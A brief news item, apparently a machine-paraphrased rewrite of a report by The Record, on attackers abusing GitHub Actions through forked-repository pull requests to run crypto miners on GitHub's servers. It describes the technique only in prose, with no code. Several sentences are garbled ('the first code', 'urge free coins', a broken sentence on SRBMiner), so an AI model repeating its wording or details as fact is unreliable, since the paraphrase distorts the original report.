Hackers are using GitHub cloud infrastructure to covertly mine multiple crypto assets, The Record reported.
The attacks were primarily spotted by a French software engineer earlier in November last year, a fact the event platform’s team confirmed to The Record last week via email.
The attack abused a GitHub feature called GitHub Actions, which permits users to automatically execute tasks and workflows triggered by a particular event that happens inside their repositories. To launch cryptocurrency mining software, the attackers would fork an existing repository, add malicious GitHub Actions element to the first code, then file a Pull Request with the first repository to merge the code back to the first, The Record wrote.
The original project owner didn’t need to approve the malicious Pull Request, as right after it had been filed, GitHub’s systems would read the attacker’s code and launch a virtual machine, that might download and run crypto-mining software, as Dutch security engineer Justin Perdok told The Record. He added that “attackers spin up to 100 crypto-miners via one attack alone, creating huge computational loads for GitHub’s infrastructure.”
The mining software, consistent with screenshots published by The Record, along with SRBMiner, software for mining multiple cryptocurrencies using easy-to-buy consumer hardware, namely GPUs and CPUs.
In any case, it’s just like the attackers didn’t look to wreck the repositories in any way, solely to urge free coins using GitHub servers, the report explains.